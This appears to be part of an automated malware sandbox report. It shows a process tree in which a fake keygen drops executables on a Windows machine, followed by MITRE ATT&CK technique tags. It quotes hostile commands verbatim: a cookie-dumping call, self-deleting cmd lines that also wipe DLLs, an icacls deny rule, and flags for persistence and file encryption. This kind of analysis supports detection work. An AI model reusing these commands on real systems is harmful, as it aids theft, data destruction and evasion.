C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:16⤵PID:5976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:16⤵PID:8720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3032 /prefetch:86⤵PID:3748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5700 /prefetch:26⤵PID:10840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1976 /prefetch:86⤵PID:8252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5664 /prefetch:86⤵PID:9972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"4⤵PID:8040
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe" >> NUL5⤵PID:8504
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:8624
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"4⤵PID:8544
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"4⤵PID:7032
-
C:\ProgramData\444818.exe"C:\ProgramData\444818.exe"5⤵PID:9424
-
-
C:\ProgramData\1416094.exe"C:\ProgramData\1416094.exe"5⤵
- Suspicious behavior: SetClipboardViewer
PID:9460
-
-
C:\ProgramData\1543556.exe"C:\ProgramData\1543556.exe"5⤵PID:9596
-
C:\ProgramData\1543556.exe"{path}"6⤵PID:8384
-
-
-
C:\ProgramData\2485131.exe"C:\ProgramData\2485131.exe"5⤵PID:9656
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"4⤵PID:9728
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:10024
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:3724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exekeygen-step-3.exe3⤵PID:5352
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exe"4⤵PID:5584
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:8148
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4828
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x40c1⤵PID:4140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8212
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8452
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7848
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5648
-
C:\Users\Admin\AppData\Local\Temp\DC30.exeC:\Users\Admin\AppData\Local\Temp\DC30.exe1⤵
- Checks processor information in registry
PID:10032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im DC30.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DC30.exe" & del C:\ProgramData\*.dll & exit2⤵PID:1180
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im DC30.exe /f3⤵
- Kills process with taskkill
PID:9312
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Suspicious use of SetThreadContext
- Delays execution with timeout.exe
PID:9596
-
-
-
C:\Users\Admin\AppData\Local\Temp\9C8.exeC:\Users\Admin\AppData\Local\Temp\9C8.exe1⤵
- Adds Run key to start application
PID:5424 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\8065b13e-c302-4ea8-9d27-9b2555360c2b" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:4124
-
-
C:\Users\Admin\AppData\Local\Temp\9C8.exe"C:\Users\Admin\AppData\Local\Temp\9C8.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Modifies extensions of user files
PID:2952 -
C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\updatewin1.exe"C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\updatewin1.exe"3⤵PID:10252
-
-
C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\updatewin2.exe"C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\updatewin2.exe"3⤵PID:10308
-
-
C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\5.exe"C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\5.exe"3⤵
- Checks processor information in registry
PID:10360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\5.exe" & del C:\ProgramData\*.dll & exit4⤵PID:11208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
PID:10424
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:3952
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:9556
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10244
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\556d392afda3478da4ec127bf67a3d08 /t 0 /p 102441⤵PID:4512
-
C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"1⤵PID:10956
-
C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"2⤵PID:9192
-
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
File and Directory Permissions Modification
1Hidden Files and Directories
1Install Root Certificate
1Modify Registry
4Web Service
1